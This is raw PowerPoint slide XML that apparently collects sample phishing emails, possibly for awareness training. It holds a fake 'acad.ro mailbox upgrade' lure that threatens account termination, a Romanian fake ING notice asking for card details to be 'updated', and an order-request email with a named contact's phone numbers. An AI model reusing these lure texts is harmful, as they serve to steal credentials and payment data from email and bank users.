              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Va rugam sa ne oferiti cele mai bune preturi oferite pentru lista noastra de comenzi atasata.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Va multumim pentru feedback-ul dvs. amabil.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cu stimă/ Tisztelettel/ Best regards/ Mit freundlichen Grüßen,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>Mihaela Paun</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Belor  S.A. | Str. Basarabiei, nr. 2, 800201, Galati, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RomaniaRomania</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tel. +40.336.401.964 | Fax. +40.336.401.966 | Mob. +40.732.222.784</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mihaela.paun@belor.ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.belor.ro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="535740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630792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(6)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707136" y="2687261"/>
            <a:ext cx="5468112" cy="3080330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dear User,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We are closing all mailbox users that are still using the old version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acad.ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> mailbox.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Your mailbox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="E1251E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user@acad.ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="E1251E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is still using this old version.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Please tap the blue button below to upgrade to the latest version and get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="E71818"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>100GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Free Space.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="E61919"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NOTE:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   Failure to do this would lead to account termination.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Follow below to upgrade and keep account active</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UPGRADE INBOX VERSION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Connected to Mail-Portal    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acad.ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  2023  Corporation. All rights reserved.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7016496" y="2687261"/>
            <a:ext cx="4005072" cy="2323713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We are deactivating all mailbox users that are still using the old version of  the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> acad.ro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mailbox.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Your email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  ***(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> user@acad.ro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)*** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is still using this old version. Please tap the blue button below to upgrade to the latest version and get 105GB Free Space.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NOTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Failure to do this would lead to account deactivation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Follow below to upgrade and keep your account active.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                                                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1150" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Upgrade inbox Version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flowchart: Process 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6559296" y="1943099"/>
            <a:ext cx="515721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6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="5910072"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48337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620877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(7); (mostra - Ana)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="2456670"/>
            <a:ext cx="5699760" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Contul dvs. este </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>blocat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Trebuie să activați noul sistem de securitate.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ca răspuns la atacurile care au lovit multe sisteme bancare în ultimele luni, un parteneriat între ING Business Bank și Poliția Poștală pentru a consolida și mai mult securitatea tranzacțiilor și a conturilor, cardul dumneavoastră de debit/credit trebuie actualizat cât mai curând posibil din motive de securitate pentru preveniți utilizarea greșită a cardurilor dvs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="BankinterMedium"/>
              </a:rPr>
              <a:t>Confirma a cum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
